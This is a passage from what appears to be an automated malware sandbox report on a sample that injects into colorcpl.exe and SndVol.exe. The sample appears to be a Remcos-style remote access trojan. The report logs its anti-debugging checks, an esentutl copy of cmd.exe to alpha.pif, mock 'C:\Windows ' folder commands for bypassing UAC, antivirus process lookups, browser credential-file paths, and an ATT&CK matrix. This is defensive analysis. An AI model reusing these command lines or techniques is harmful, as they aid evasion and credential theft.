                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess queried: DebugPort
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B22E37 IsDebuggerPresent,5_2_00B22E37
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0289894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_0289894C
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B2C1FA mov eax, dword ptr fs:[00000030h]5_2_00B2C1FA
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046A3355 mov eax, dword ptr fs:[00000030h]8_2_046A3355
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_06701103 mov eax, dword ptr fs:[00000030h]8_2_06701103
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_06744070 mov eax, dword ptr fs:[00000030h]8_2_06744070
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B2C1FA mov eax, dword ptr fs:[00000030h]10_2_00B2C1FA
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00443355 mov eax, dword ptr fs:[00000030h]17_2_00443355
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05121103 mov eax, dword ptr fs:[00000030h]17_2_05121103
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05164070 mov eax, dword ptr fs:[00000030h]17_2_05164070
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B0A9D4 GetEnvironmentStringsW,GetProcessHeap,RtlAllocateHeap,memcpy,FreeEnvironmentStringsW,5_2_00B0A9D4
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B16EC0 SetUnhandledExceptionFilter,5_2_00B16EC0
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B16B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00B16B40
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0469503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0469503C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04694A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_04694A8A
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0469BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0469BB71
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04694BD8 SetUnhandledExceptionFilter,8_2_04694BD8
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B16EC0 SetUnhandledExceptionFilter,10_2_00B16EC0
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B16B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00B16B40
                  Source: C:\Users\Public\xpha.pifCode function: 11_2_00D13470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00D13470
                  Source: C:\Users\Public\xpha.pifCode function: 11_2_00D13600 SetUnhandledExceptionFilter,11_2_00D13600
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0043503C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00434A8A
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0043BB71
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00434BD8 SetUnhandledExceptionFilter,17_2_00434BD8
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0515C88C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0515C88C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_051557A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_051557A5
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05155D57 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_05155D57
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_051558F3 SetUnhandledExceptionFilter,17_2_051558F3

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 6700000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 5120000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeThread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 6701617Jump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFThread created: C:\Windows\SysWOW64\SndVol.exe EIP: 5121617Jump to behavior
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 6700000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFMemory written: C:\Windows\SysWOW64\SndVol.exe base: 5120000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 6700000Jump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFMemory written: C:\Windows\SysWOW64\SndVol.exe base: 5120000Jump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe8_2_04672132
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe17_2_00412132
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04679662 mouse_event,8_2_04679662
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
                  Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
                  Source: colorcpl.exe, 00000008.00000002.4115847065.00000000027BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: colorcpl.exe, 00000008.00000002.4115847065.00000000027BA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.4115847065.0000000002780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04694CB6 cpuid 8_2_04694CB6
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02885ACC
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: GetLocaleInfoA,0_2_0288A7C4
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02885BD8
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: GetLocaleInfoA,0_2_0288A810
                  Source: C:\Users\Public\alpha.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,5_2_00B08572
                  Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,5_2_00B06854
                  Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,5_2_00B09310
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_046B24BC
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,8_2_046A8484
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,8_2_046B25C3
                  Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_046B2690
                  Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,8_2_046B201B
                  Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,8_2_046B20B6
                  Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_046B2143
                  Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,8_2_046B2393
                  Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_046B1D58
                  Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,8_2_046B1FD0
                  Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,8_2_046A896D
                  Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoA,8_2_0466F90C
                  Source: C:\Users\Public\alpha.pif | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,10_2_00B08572
                  Source: C:\Users\Public\alpha.pif | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,10_2_00B06854
                  Source: C:\Users\Public\alpha.pif | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,10_2_00B09310
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIF | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_02805ACC
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIF | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_02805BD7
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIF | Code function: GetLocaleInfoA,16_2_0280A810
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,17_2_0045201B
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,17_2_004520B6
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,17_2_00452143
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,17_2_00452393
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,17_2_00448484
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_004524BC
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,17_2_004525C3
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_00452690
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,17_2_0044896D
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoA,17_2_0040F90C
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,17_2_00451D58
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,17_2_00451FD0
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoA,17_2_05130627
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,17_2_05172D36
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,17_2_05172DD1
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,17_2_05172CEB
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,17_2_05172E5E
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,17_2_05172A73
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,17_2_05169688
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,17_2_0516919F
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_051731D7
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,17_2_051730AE
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_051733AB
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,17_2_051732DE
                  Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\Public\alpha.pif | Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe | Code function: 0_2_0288920C GetLocalTime,0_2_0288920C
                  Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_0467B69E GetUserNameW,8_2_0467B69E
                  Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_046A942D _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,8_2_046A942D
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe | Code function: 0_2_0288B78C GetVersionExA,0_2_0288B78C
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIF | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: cmdagent.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: quhlpsvc.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgamsvr.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: TMBMSRV.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Vsserv.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgupsvc.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgemc.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000011.00000003.1910126332.000000000308E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000002.4115847065.00000000027BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000011.00000002.1911052257.000000000308E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000002.4115847065.0000000002780000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 7124, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 5764, type: MEMORYSTR
                  Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 8_2_0466BA4D
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 17_2_0040BA4D
                  Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 8_2_0466BB6B
                  Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \key3.db 8_2_0466BB6B
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 17_2_0040BB6B
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \key3.db 17_2_0040BB6B

                  Remote Access Functionality

                  Source: C:\Windows\SysWOW64\colorcpl.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-SKG82E
                  Source: C:\Windows\SysWOW64\SndVol.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-SKG82E
                  Source: Yara match | File source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000011.00000003.1910126332.000000000308E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000002.4115847065.00000000027BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000011.00000002.1911052257.000000000308E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000002.4115847065.0000000002780000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 7124, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 5764, type: MEMORYSTR
                  Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: cmd.exe 8_2_0466569A
                  Source: C:\Windows\SysWOW64\SndVol.exe | Code function: cmd.exe 17_2_0040569A
                  MITRE ATT&CK matrix, listed per tactic column (a leading number is the signature count shown in the report; entries without a number were not observed):

                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information
                  Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server
                  Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
                  Execution: 2 Windows Management Instrumentation; 1 Native API; 1 Command and Scripting Interpreter; 2 Service Execution; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
                  Persistence: 1 DLL Side-Loading; 1 Valid Accounts; 1 Windows Service; 1 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
                  Privilege Escalation: 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Valid Accounts; 11 Access Token Manipulation; 1 Windows Service; 422 Process Injection; 1 Registry Run Keys / Startup Folder; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
                  Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Timestomp; 1 DLL Side-Loading; 1 Bypass User Account Control; 1 File Deletion; 221 Masquerading; 1 Valid Accounts; 3 Virtualization/Sandbox Evasion; 11 Access Token Manipulation; 422 Process Injection
                  Credential Access: 1 OS Credential Dumping; 111 Input Capture; 2 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
                  Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 1 System Network Connections Discovery; 2 File and Directory Discovery; 65 System Information Discovery; 251 Security Software Discovery; 3 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery; Process Discovery
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content
                  Collection: 11 Archive Collected Data; 111 Input Capture; 3 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
